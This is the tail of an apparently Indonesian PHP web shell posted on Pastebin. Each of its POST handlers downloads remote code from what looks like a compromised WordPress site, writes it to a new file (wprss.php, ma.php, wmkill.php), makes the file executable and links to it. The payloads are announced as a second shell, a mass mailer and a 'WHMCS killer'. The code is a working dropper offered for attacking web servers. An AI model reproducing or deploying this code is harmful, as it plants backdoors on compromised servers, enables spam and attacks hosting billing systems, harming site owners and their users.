  769. $cgi = 'http://calorfmcumana.com/Respaldo_Web/wp-includes/idb.txt';
  770. $get11 = $sh($cgi);
  771. $idbk = fopen('wprss.php', 'w');
  772. fwrite($idbk,$get11);
  773. fclose($idbk);
  774. {
  775. @chmod('wprss.php',0755);
  776. }
  777. echo "<font color='aqua'>";
  778. echo "IDBTE4M SHELL V4 READY <br/>
  779. Silahkan kunjungi http://alamat-domain-kamu/wprss.php atau lihat hasilnya <a href='wprss.php' target='_blank'>DISINI</a></center></br>";
  780. echo "</font>";
  781. }
  782. echo "</font>";
  783. if($_POST['ma']) {
  784. $cgi = 'http://calorfmcumana.com/Respaldo_Web/wp-includes/ww.txt';
  785. $get11 = $sh($cgi);
  786. $idbk = fopen('ma.php', 'w');
  787. fwrite($idbk,$get11);
  788. fclose($idbk);
  789. {
  790. @chmod('ma.php',0755);
  791. }
  792. echo "<font color='aqua'>";
  793. echo "MAILER READY KAPTEN <br/>
  794. Silahkan kunjungi http://alamat-domain-kamu/idbte4m.cgi atau lihat hasilnya <a href='ma.php' target='_blank'>DISINI</a></center></br>";
  795. echo "</font>";
  796. }
  797. echo "</font>";
  798. if($_POST['ws']) {
  799. $cgi = 'http://calorfmcumana.com/Respaldo_Web/wp-includes/n.txt';
  800. $get11 = $sh($cgi);
  801. $idbk = fopen('wmkill.php', 'w');
  802. fwrite($idbk,$get11);
  803. fclose($idbk);
  804. {
  805. @chmod('wmkill.php',0755);
  806. }
  807. echo "<font color='aqua'>";
  808. echo "WHMCS KILLER READY <br/>
  809. Silahkan kunjungi http://alamat-domain-kamu/wprss.php atau lihat hasilnya <a href='wmkill.php' target='_blank'>DISINI</a></center></br>";
  810. echo "</font>";
  811. }
  812. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!